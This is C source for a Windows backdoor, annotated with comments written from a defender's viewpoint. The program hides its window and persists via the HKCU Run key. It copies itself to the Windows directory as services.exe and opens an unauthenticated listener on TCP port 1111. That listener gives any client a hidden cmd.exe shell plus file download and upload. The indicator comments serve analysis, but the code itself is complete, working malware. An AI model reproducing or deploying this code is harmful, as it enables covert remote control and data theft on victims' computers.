//includes
#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <small.h>

#include "..\\Includes\\Includes.h"
#include "..\\Includes\\Small.h"

//consts
// Listening TCP port. main() binds it on INADDR_ANY, i.e. on every interface.
#define PORT 1111
// Poll interval in milliseconds between checks of the cmd.exe output pipe.
#define SLEEP_TIME 500
// Session-ending command. A client sending it closes the session; main() also
// writes it to cmd.exe's stdin on teardown so the child exits.
#define szExit "exit\r\n"
// Only referenced from send() calls that are commented out in main(); never sent.
#define szError "Some shit happend"

// Persistence artefacts a defender can look for on a host:
//  - Run value name under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
#define szRegshit "666"
//  - file name appended to the Windows directory (GetWindowsDirectory), so the
//    copy lands in the Windows directory itself, not in System32 where the
//    genuine services.exe lives
#define szName    "\\services.exe"

// Single-instance mutex name; a second instance sees ERROR_ALREADY_EXISTS and exits.
#define szMtx   "-. .-"
//              |    |
//               \___/

//main function
//
// Bind-shell backdoor, read from a defender's point of view. What this entry
// point does, in order:
//  1. hides its own console window and exits if the mutex szMtx already exists;
//  2. registers <WinDir>\services.exe under the HKCU Run key (value szRegshit),
//     copies its own image to that path and relaunches from there;
//  3. listens on TCP PORT on all interfaces and, for every accepted connection
//     (no authentication, no source check), spawns a hidden cmd.exe whose
//     stdin/stdout/stderr are bridged to the socket;
//  4. additionally serves file download (DOWNLOAD_MARK) and file upload
//     (UPLOAD_MARK / FILENAME_MARK / FILESIZE_MARK) over the same socket.
//
// MAX_BUFF, DEFAULT_MARK, END_MARK, DOWNLOAD_MARK, UPLOAD_MARK, FILESIZE_MARK,
// FILENAME_MARK, ENDF_MARK and DOWNLOAD come from ..\Includes\Includes.h, which
// is not shown here; comments below that depend on their values are hedged.
//
// Host-side indicators visible in this source: the Run value name, the
// services.exe copy outside System32, the mutex name, a listener on PORT, and
// cmd.exe started with redirected standard handles by that process.
//
// Returns 0 only in theory: the outer accept loop never breaks, so the
// cleanup after it is unreachable; -1 is returned on bind()/listen() failure.
int main()
{
 WSADATA wsa;
 struct sockaddr_in sin;
 struct sockaddr_in sa = {0}; // never used

 char szbuff[MAX_BUFF];       // shared I/O buffer; byte 0 carries the protocol tag
 char szFile[MAX_PATH];       // own image path at first, later the client-chosen upload path

 int a_sock,sock;             // listening socket / per-connection socket

 SECURITY_ATTRIBUTES sec_att;
 STARTUPINFO startup_info;
 HANDLE hReadPip1,hReadPip2;  // pipe 1: cmd.exe -> socket, pipe 2: socket -> cmd.exe
 HANDLE hWritePip1,hWritePip2;
 HKEY hKey;

 unsigned long dwBytesR;
 unsigned long ulWrite;

 unsigned int uSize;          // remaining bytes of the file being downloaded
 unsigned int uSend;          // bytes sent in the current download chunk
 unsigned int uMove;          // file offset, computed relative to FILE_END
 unsigned int uMode;          // receives ReadFile's bytes-read count (misnamed)
 unsigned int uByteS;         // send() result; unsigned, see note at the <= 0 test

 int rsize;                   // recv() result (signed, so errors are detectable)

 HANDLE hFile;

 //Hide Console window | CreateMutex because we only need one our running
 //process | Copy itself to win dir | Autorun shit |

  // Hide the process' own console (SW_HIDE == 0).
  ShowWindow(FindWindow("ConsoleWindowClass",0),0);

  // Single-instance guard: the mutex handle is kept for the process lifetime.
  CreateMutex(0,FALSE, szMtx);

  if(GetLastError() == ERROR_ALREADY_EXISTS)
  {
   ExitProcess(0);
  }

  // szbuff = "<Windows directory>" + "\services.exe"; lstrcat is unbounded
  // but the directory name is far shorter than MAX_BUFF in practice.
  GetWindowsDirectory(szbuff,sizeof(szbuff));
  lstrcat(szbuff,szName);

  // Path of the image this process was started from.
  GetModuleFileName(GetModuleHandle(0),szFile,sizeof(szFile));
  
  // Persistence: Run value szRegshit -> services.exe path. Note the data
  // length is sizeof(szbuff) (the whole MAX_BUFF buffer, including whatever
  // follows the terminator), so the stored REG_SZ is oversized — a quirk
  // that can itself be used to recognise this sample's registry artefact.
  if(RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey) == ERROR_SUCCESS)
  {
   RegSetValueEx(hKey,szRegshit,0,REG_SZ,szbuff,sizeof(szbuff));
   RegCloseKey(hKey);
  }

  // Not yet running from the install path: copy self there (bFailIfExists
  // is FALSE, so an existing file is overwritten), start the copy, and exit.
  if(lstrcmp(szbuff,szFile))
  {
   CopyFile(szFile,szbuff,FALSE);
   ShellExecute(0, "open",szbuff,0,0,SW_HIDE);
   ExitProcess(0);
  }

 //Initialize winsock library (version 1.1 requested)
  WSAStartup(0x101,&wsa);

  //Create socket
  a_sock = socket(AF_INET,SOCK_STREAM,0);

  //If cant create socket exit
  // (socket() reports failure as INVALID_SOCKET, so this comparison with 0
  // does not observe it; a failed socket then falls through to bind(),
  // whose failure returns -1 below.)
  if(a_sock == 0)
  {
   return -1;
  }

  //fill structure 
  sin.sin_family = AF_INET; //TCP
  sin.sin_addr.s_addr = INADDR_ANY; //Accept any ip — listener is reachable on every interface
  sin.sin_port = htons(PORT); //listen on this port

  //try to bind socket to port | error -> exit
  if(bind(a_sock,(SOCKADDR *)&sin,sizeof(sin)) != 0)
  {
   return -1;
  }

  //listen and accept only one connection | error -> exit
  if(listen(a_sock,1) != 0)
  {
   return -1;
  }

  //Loop forever (no break exists for this loop; see the note at the end)
  while(1)
  {
   //Accept incoming connection — peer address is discarded, nothing is
   //checked or authenticated before the shell is handed over.
   sock = accept(a_sock,0,0);
   
   //error -> loop again
   if(sock == INVALID_SOCKET)continue;

   //fill structure
   sec_att.lpSecurityDescriptor = 0; // default security descriptor
   sec_att.bInheritHandle = TRUE;    // pipe handles must be inheritable by the child cmd.exe
   sec_att.nLength = sizeof(SECURITY_ATTRIBUTES); // sizeof(SECURITY_ATTRIBUTES) struct

   //create the pipes for our command promp
   //pipe 1: child writes (hWritePip1), we read (hReadPip1)
   //pipe 2: we write (hWritePip2), child reads (hReadPip2)
   CreatePipe(&hReadPip1,&hWritePip1,&sec_att,0);
   CreatePipe(&hReadPip2,&hWritePip2,&sec_att,0);

   //The GetStartupInfo function retrieves the contents of the 
   //STARTUPINFO structure that was specified when the calling 
   //process was created.(MSDN)
   GetStartupInfo(&startup_info);

   //fill structure
   startup_info.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; //standard input/output
   startup_info.wShowWindow = SW_HIDE; //hide window
   startup_info.hStdOutput = startup_info.hStdError = hWritePip1; //hWritePip1 is handle for output
   startup_info.hStdInput = hReadPip2; //and hReadPip2 is handle for input

   //run cmd
   //The PROCESS_INFORMATION out-parameter is aliased onto startup_info, so the
   //new process/thread handles overwrite the head of that struct and are never
   //closed or used again: one leaked process and thread handle per connection.
   //cmd.exe is only ever ended by the szExit write after the session loop.
   CreateProcess(0,"cmd.exe",0,0,TRUE,CREATE_NEW_CONSOLE,0,0,&startup_info,(PROCESS_INFORMATION*)&startup_info);

   //Loop forever again :)
   //Session loop: every iteration either forwards pending cmd.exe output to
   //the client, or (if there is none) blocks in recv() for the next client
   //packet. Any break here tears the session down and returns to accept().

   while(1)
   {
	Sleep(SLEEP_TIME); //Sleep

    //Check do we have something ?
    //Non-blocking peek of the child's output. The buffer size passed is
    //MAX_BUFF although the destination starts at szbuff[1]; dwBytesR receives
    //the number of bytes copied.
    if(PeekNamedPipe(hReadPip1,&szbuff[1],MAX_BUFF,&dwBytesR,0,0) == 0)
	{
	 break;
	}

	if(dwBytesR) 
    {
	 //First char means something (download,upload,standard command)
	 //Wire format in both directions: one tag byte, then the payload.

	 szbuff[0] = DEFAULT_MARK;

     //read data from cmd.exe
     if(ReadFile(hReadPip1,&szbuff[1],dwBytesR,&dwBytesR,0) == 0)
	 {
	  break;
	 }
     
	 //send it to client (tag byte + dwBytesR bytes of output)
     if(send(sock,szbuff,dwBytesR+1,0) <= 0)
	 {
	  break;
	 }

	 dwBytesR = 0;
    }
    else
    {
	 //clear buff
 	 ZeroMemory(szbuff,MAX_BUFF);

	 //recive buffer (blocking; MAX_BUFF-1 keeps room for a terminator)
     dwBytesR=rsize=recv(sock,szbuff,MAX_BUFF-1,0);

	 //if some error happens break this loop
	 if(rsize <= 0)
	 {
	  break;
	 }
   
	 //does client send "exit" string (payload starts after the tag byte)
	 if(strncmp(&szbuff[1],szExit,lstrlen(szExit)) == 0)
	 {
	  break;
	 }
   
	 //add END_MARK on szbuff
	 //(the "-4" strips below suggest END_MARK is a 4-byte string — confirm in Includes.h)
	 lstrcat(szbuff,END_MARK);

	 //Check what client sends — dispatch on the tag byte
	 switch(szbuff[0])
	 {
	 case DEFAULT_MARK:
		  //This means simple command
		  //Write it to cmd.exe (dwBytesR still holds the recv() length, so
		  //the write covers the payload plus the first byte of END_MARK)
		  WriteFile(hWritePip2,&szbuff[1],dwBytesR,&dwBytesR,0);
		  break;

	 case DOWNLOAD_MARK:
          //Client wants to download something: the client-supplied path is
          //opened and streamed back in MAX_BUFF-2 byte chunks, each prefixed
          //with DOWNLOAD_MARK. Any file the process can read is exposed.

		  //Remove END_MARK
		  szbuff[lstrlen(szbuff)-4] = '\0';
		  
		  //Open file for reading
		  //Path is taken lstrlen(DOWNLOAD)+2 bytes in, i.e. presumably after
		  //"<tag><DOWNLOAD keyword><one separator>" — layout defined by the client side.
		  hFile = CreateFile(&szbuff[lstrlen(DOWNLOAD)+2],GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
		  
		  //Can't open file (nothing is reported back; the send is commented out)
		  if(hFile == INVALID_HANDLE_VALUE)
		  {
		   //send(sock,szError,lstrlen(szError),0);
		   break;
		  }

		  //Get File size (low 32 bits only; the high part is discarded)
		  uSize = GetFileSize(hFile,0);

		  //put that size into szbuff with specific mark at the beggining
		  wsprintf(szbuff,"%c%d",FILESIZE_MARK,uSize);

		  //send it to client
		  uByteS = send(sock,szbuff,lstrlen(szbuff),0);

		  //error -> break
		  //(uByteS is unsigned, so only a zero-byte send trips this; a
		  //SOCKET_ERROR result is seen as a large positive value)
		  if(uByteS <= 0)
		  {
		   break;
		  }

		  //put in szbuff download_mark char because client will know
		  //that is server sending file

		  szbuff[0] = DOWNLOAD_MARK;

		  //loop while uSize is positive number
		  while(uSize)
		  {
		   //Zero szbuff exept first char(DOWNLOAD_MARK)
		   ZeroMemory(&szbuff[1],MAX_BUFF-1);

		   uSend = MAX_BUFF-2;

		   //Do I need explain this ? blah — last chunk is the remainder
		   if(uSend>uSize)
		   {
		    uSend=uSize;
		   } 

		   //If uSize is smaller or equal to ZERO break
		   //(reinterpreting the unsigned remainder as int; files of 2 GiB or
		   //more are therefore cut off here)
		   if((int)uSize <= 0)
		   {
		    break;
		   }

		   //uMove is holding position in file
		   //0 - uSize wraps to the unsigned form of -uSize; passed to
		   //SetFilePointer as a LONG it becomes a negative offset from the end,
		   //so the read position is (file size - remaining bytes).
		   uMove = 0-uSize;

		   //set position to uMove in file from end file
		   SetFilePointer(hFile,uMove,0,FILE_END);

		   //read that part from file and put it into szbuff
		   //(uMode receives the bytes actually read; it is not checked)
		   ReadFile(hFile,&szbuff[1],uSend,&uMode,0);

		   //send it to client (tag byte + uSend bytes of file data)
		   uByteS = send(sock,szbuff,uSend+1,0);

		   //error -> break
		   if(uByteS == SOCKET_ERROR)
		   {
		    break;
		   }

		   //Substract sended bytes from uSize
		   uSize = uSize - uSend;

		  }
       
		  //Close handle
		  CloseHandle(hFile);

		  break;

	 case UPLOAD_MARK:
          //Uploading file: the client streams chunks until one arrives whose
          //tag byte is ENDF_MARK. Data is appended to szFile, which is either
          //the path set by a prior FILENAME_MARK packet or, if none was sent,
          //still this process' own image path from GetModuleFileName().

		  //Open file for writing (created if missing, otherwise opened as is)
		  hFile = CreateFile(szFile,GENERIC_WRITE,0,0,OPEN_ALWAYS,0,0);

		  //Can't create file
		  if(hFile == INVALID_HANDLE_VALUE) 
		  {
		   //send(sock,szError,lstrlen(szError),0);
		   break;
		  }

		  //While client doesn't send ENDF_MARK
		  //First pass writes the payload of the UPLOAD_MARK packet itself.
		  while(szbuff[0] != ENDF_MARK)
		  {
		   //Set the pointer at end of file (append)
		   SetFilePointer(hFile,0,0,FILE_END);

		   //Write szbuff to file — rsize-1 bytes, i.e. everything after the tag
		   WriteFile(hFile,&szbuff[1],rsize-1,&ulWrite,0);

		   //Zero szbuff
		   ZeroMemory(szbuff,MAX_BUFF);
          
		   //receive buffer
           rsize=recv(sock,szbuff,MAX_BUFF-1,0);

		   //error break
		   if(rsize <= 0)
		   {
			break;
		   }
		  }

		  //Close Handle
		  CloseHandle(hFile);

	      break;

	 case FILESIZE_MARK:
		  //Convert file size into number
		  //(client-supplied text via atoi: no range or error checking; the
		  //value is not read anywhere else in this function)
		  uSize = atoi(&szbuff[1]);
		  break;

	 case FILENAME_MARK:
          //get File name that client sends: sets the destination of the next
          //UPLOAD_MARK. The path is client-controlled and copied with an
          //unbounded lstrcpy into the MAX_PATH-sized szFile.

		  //remove last 4 bytes (END_MARK)
		  szbuff[lstrlen(szbuff)-4] = '\0';

		  //copy it to szFile
		  lstrcpy(szFile,&szbuff[1]);

		  //put upload mark into szbuff
		  szbuff[0] = UPLOAD_MARK;
		  szbuff[1] = '\0';

		  //send it to client (acknowledgement: a lone UPLOAD_MARK byte)
		  send(sock,szbuff,lstrlen(szbuff),0);

	      break;
	 }
    }
   }

   //write "exit" command to cmd.exe so the child terminates on its own
   WriteFile(hWritePip2,szExit,lstrlen(szExit),&dwBytesR,0);

   //Close handles (the process/thread handles from CreateProcess are not
   //among them, see the note above)
   CloseHandle(hWritePip2);
   CloseHandle(hReadPip1);
   CloseHandle(hWritePip1);
   CloseHandle(hReadPip2);

   //Close socket
   closesocket(sock);

  }
  //Close socket
  //Unreachable: the accept loop above has no break, so the listener is only
  //released when the process dies.
  closesocket(a_sock);
  closesocket(sock);
  WSACleanup();
  //Exit
 return 0;
}

//----------------LIBS----------------+
#pragma comment(lib,"wsock32.lib")
#pragma comment(lib,"wininet.lib")